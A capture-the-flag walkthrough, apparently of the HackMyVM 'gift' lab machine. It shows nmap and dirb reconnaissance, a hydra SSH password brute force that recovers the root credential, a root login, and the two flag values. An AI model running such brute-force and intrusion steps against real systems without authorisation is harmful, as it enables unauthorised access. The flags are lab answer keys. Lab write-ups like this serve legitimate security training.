TOOL : netdisocver , nmap , curl , dirb , ssh
1. Recon
- Get IP of target : GOT 192.168.0.103
$ sudo netdiscover
192.168.0.1
192.168.0.103
- Port SCan : GOT port 22 and 80 open
$ sudo nmap -sS -F 192.168.0.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 09:47 IST
Nmap scan report for 192.168.0.103
Host is up (0.00013s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:C9:B7:CE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
- Done an Service Scan : GOT OpenSSH and nginx
$ sudo nmap -sV -F 192.168.0.103
[sudo] password for zen:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 09:54 IST
Nmap scan report for 192.168.0.103
Host is up (0.00026s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
80/tcp open http nginx
MAC Address: 08:00:27:C9:B7:CE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds
2. Check : 80/http
Inspect Page : Got nothing
$ curl http://192.168.0.103
Dont Overthink. Really, Its simple.
<!-- Trust me -->
Directory check : Still nothing
$ dirb http://192.168.0.103
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Oct 22 09:58:41 2023
URL_BASE: http://192.168.0.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.103/ ----
+ http://192.168.0.103/index.html (CODE:200|SIZE:57)
-----------------
END_TIME: Sun Oct 22 09:58:41 2023
DOWNLOADED: 4612 - FOUND: 1
3. Check : 22/ssh
brute force ssh : found credential : root:simple
wordlist :
$ hydra ssh://192.168.0.103 -l root -P rockup.txt -V -f
[22][ssh] host: 192.168.0.103 login: root password: simple
[STATUS] attack finished for 192.168.0.103 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
SSH Login
$ ssh root@192.168.0.103
root@192.168.0.103's password:
IM AN SSH SERVER
gift:~#
GET Flags
gift:~# ls
root.txt user.txt
gift:~# cat root.txt
HMVtyr543FG
gift:~# cat user.txt
HMV665sXzDS
gift:~#